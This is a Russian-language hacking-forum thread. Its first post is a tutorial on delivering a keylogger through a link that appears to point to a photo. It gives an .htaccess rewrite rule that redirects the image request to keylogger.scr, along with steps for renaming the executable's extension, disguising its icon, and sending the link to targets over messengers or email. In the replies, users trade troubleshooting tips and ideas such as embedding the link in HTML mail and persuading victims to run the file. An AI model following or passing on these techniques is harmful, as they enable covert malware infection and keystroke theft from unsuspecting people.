РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Автоматическая скачка кейлоггера при клике по ссылке ведущей на картинку.

webster

Гость
Наверняка вы сталкивались со спамом подобным этому:
«Привет! Посмотри вчерашние фотки тут
http://имя_сайта/клёвая_картинка.jpg».
Вроде вполне безобидное сообщение, особенно если оно приходит по ICQ от друзей.
Но на самом деле при клике на ссылку начинается загрузка исполняемой программы, например кейлоггера.
Самое интересное, что ссылка действительно ведёт на картинку.
Сегодня некоторые пользователи привыкли проверять куда их отправляют по строке состояния,
и если её вывод будет отличаться от текста, то они заподозрят неладное.
Так как же сделать так, чтобы при клике на ссылку-картинку начал автоматически загружаться кейлоггер?


Очень просто. Достаточно в той папке на вашем сервере, где находится картинка и кейлогер,
создать скрытый файл .htaccess (файлы, которые начинаются с точки являются скрытыми в unix системах,
а именно на них крутятся почти все сервера). Со следующим содержанием:

RewriteEngine On
RewriteRule foto.jpg
http://имя_сайта/пут...е/keylogger.scr

Например, на локальном сервере это выглядит так:

Рекомендуется писать полный путь к кейлоггеру, в противном случае возможно, что в некоторых браузерах
скачка не будет происходить вовсе, или будет качаться keylogger с расширением jpg.

Также настоятельно рекомендуется создать в папке файл index.html или index.php (можно пустой),
чтобы нельзя было открыть папку, как каталог, через браузер.

Кстати, вы уже наверняка заметили, что в примере приводится ссылка на keylogger.scr, хотя он изначально
имеет exe расширение. Для windows exe и scr файлы являются исполняемыми и ей всё равно, какое из этих
двух расширений будет у файла.

Чтобы поменять расширение с exe на scr достаточно просто переименовать файл.
Однако windows по умолчанию скрывает расширения знакомых ему файлов.
Чтобы видеть полное имя файла нужно зайти в «Сервис > Свойства папки»
(в windows 7 нужно предварительно нажать Alt).



После чего выбрать вкладку «Вид» и убрать галочку с «Скрывать расширения для зарегистрированных типов файлов».


Затем нажимаем «OK», и можно менять расширение с exe на scr простым переименованием.



Не забудьте также сменить иконку у кейлоггера, на иконку от картинки.
Иконку можете сменить программой
"Resource Hacker".

Остаётся только отправить ссылку на «фото» вашей цели. Отправлять её через аську, скайп, сайты,
комментарии, почтой или другими способами - это уже решать вам.

Автор: неизвестен.
 
Сообщения
61
Реакции
49
Баллы
23
Почему то не получилось, но все равно спасибо.
Все, все получилось. Но вот если бы он еще не спрашивал сохранить или нет и потом сам запускал то тогда ваще было бы круть :D
 
OP

trojface

Гость
У меня чет не получается :(
В .htaccess ссылки полные делал,все как написано. На хостинге все права для файла перепробовал.
Выводит только фото ,скачивания не происходит.
В чем может быть дело?
 
OP

webster

Гость
Если хостинг бесплатный, то возможно .htaccess не работает.
 
OP

trojface

Гость
А если енту ссылочку на фоточку в html письмо добавить то файлик вообще будет загружаться при открытии письма. Спасибо за информацию.
 
OP

Ree4

Гость
файл то сам не запустится, нет смысла вообще мутить такое
 
OP

trojface

Гость
Можно так преподнести что запустит сама жертва
 
Сверху